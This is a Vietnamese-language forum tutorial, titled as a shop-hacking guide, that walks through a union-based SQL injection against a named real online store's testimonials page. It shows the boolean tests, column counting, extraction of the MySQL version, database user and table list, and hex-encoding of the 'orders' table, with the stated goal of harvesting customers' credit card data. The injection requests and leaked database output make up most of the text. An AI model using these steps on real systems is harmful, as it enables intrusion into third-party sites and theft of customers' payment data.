tut hack shop php mysql 5

1. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
2.  
3. select * FROM customer_testimonials WHERE testimonials_id = 25\'
4. de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc
5.  
6. https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*
7.  
8. bat ra 1 page voi gia tri true = 1
9.  
10. https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*
11.  
12. bat ra 1 page voi gia tri false = 0
13.  
14. anh em du dk tren thi tien hanh hack site nha'
15.  
16.  
17. bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi
18.  
19.  
20.  
21.  
22. https://www.185elgin.com/customer_te...,3,4,5,6,7,8--
23.  
24. Querry từ 1-8 nhảy ra lỗi này
25.  
26. Quote:
27.  
28. nhay ra loi 3&6 ta lay o vi tri so 3 nhe
29. 3
30.  
31. 6
32. Đinh vị lấy số 3 làm tâm điểm như dưới nha !
33.  
34. bay gio ta tim xem phien ban mysql cua site nay la bao nhieu de tuy bien khai thac nhe
35.  
36. ta nen dung ham concat_ws(0x3a,version(),user(),database() de tim nhe
37.  
38. https://www.185elgin.com/customer_te...)),4,5,6,7,8--
39.  
40. nhu vay la ver mysql 5.0.xx
41.  
42.  
43. Quote:
44.  
45. 5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgi n
46.  
47. den day ta co the khai thac theo kieu inject mysql 5.0 roai
48.  
49.  
50. ta di tim table dau tien cua site nhe
51.  
52. https://www.185elgin.com/customer_te...0limit%201,1--
53.  
54.  
55.  
56. Quote:
57.  
58. ra tiep table dau tien la: COLLATIONS
59. Meo nho cho cac tester luoi querry ra tung table mot ta lam nhu sau
60.  
61.  
62. https://www.185elgin.com/customer_te...chema.tables--
63.  
64.  
65. Quote:
66.  
67.  
68. CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book, address_format,banners,banners_history,card_surcha rges,categories,categories_description,configurati on,configuration_group,counter,counter_history,cou ntries,currencies,customer_testimonials,customers, customers_basket,customers_basket_attributes,custo mers_info,geo_zones,languages,link_categories,link _categories_description,links,links_check,links_de scription,links_featured,links_status,links_to_lin k_categories,manufacturers,manufacturers_info,news letters,orders,orders_maxmind,orders_products,orde rs_products_attributes,orders_products_download,or ders_status,orders_status_history,orders_total,pro ducts,products_attributes,products_attributes_down load,products_description,products_notifications,p roducts_options,products_options_values,products_o ptions_values_to_product
69. do the la ta da co table dau tien va cac cac tables cua site roi.
70.  
71. bay gio ta tien hanh tim table nao co chua cc nha :d
72.  
73. ta tien hanh querry lay tat ca cc tu table orders xem nhe'
74.  
75. truoc tien phai convert sang dang hex nhe
76.  
77. ta vao day http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
78. convert orders ra cai nay 0x6F7264657273
79.  
80. https://www.185elgin.com/customer_te...0x6F7264657273
81.  
82.  
83. Quote:
84.  
85. orders_id
86.  
87. 6
88. Click here to view all testimonials
89.  
90.  
91.  
92.  
93. Testimonial by 4
94. customers_id
95.  
96. 6
97. Click here to view all testimonials
98.  
99.  
100.  
101.  
102. Testimonial by 4
103. customers_name
104.  
105. 6
106. Click here to view all testimonials
107.  
108.  
109.  
110. ...........................................
111.  
112. Xong roi day ta lay nhung info can thiet de get cc nao
113.  
114. https://www.185elgin.com/customer_te...+from+orders--